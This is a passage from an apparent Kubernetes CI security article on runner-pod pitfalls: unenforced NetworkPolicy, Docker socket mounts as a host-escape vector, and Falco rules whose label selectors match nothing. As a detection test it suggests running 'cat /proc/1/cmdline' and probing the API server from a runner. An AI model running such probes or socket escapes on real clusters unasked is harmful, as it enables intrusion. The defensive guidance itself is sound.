NetworkPolicy without CNI enforcement: Creating a NetworkPolicy object in a cluster running a CNI plugin that does not enforce it produces no security effect whatsoever. The object is accepted by the API server and stored in etcd but never applied to iptables or eBPF rules. Flannel in its default configuration, for example, does not enforce NetworkPolicy. Calico, Cilium, and Weave Net do. Before relying on the network policy controls in this article, verify that your CNI enforces them: deploy a test pod with the runner labels and attempt to connect to the Kubernetes API server. If the connection succeeds, enforcement is not active.

Docker socket mount “just for one step”: The Docker socket mount is often added incrementally. A workflow needs to build an image; the platform engineer adds the socket mount “temporarily”; the runner pod becomes a permanent host-escape vector. There is no safe scoping of a Docker socket mount — any workflow step on that runner, not just the one that needs Docker, can use the socket. The correct solution is Kaniko or Buildah, not a scoped mount. If the Docker socket is present in any runner pod configuration, assume that any workflow on that runner has node-level access.

Falco rules with wrong label selectors: The Falco rules above select pods by container.label.app = "arc-runner". If the AutoscalingRunnerSet pod template does not include this label, the rules match nothing. The field matters as well: container.label.* reads container runtime labels, while Kubernetes pod labels are normally exposed as k8s.pod.label.*, so check which one your Falco deployment populates for runner pods. After deploying the rules, verify with a test: run a workflow step that executes cat /proc/1/cmdline and confirm the Falco alert fires. Silence is not safety; silence may mean the rule selector does not match your runner pods.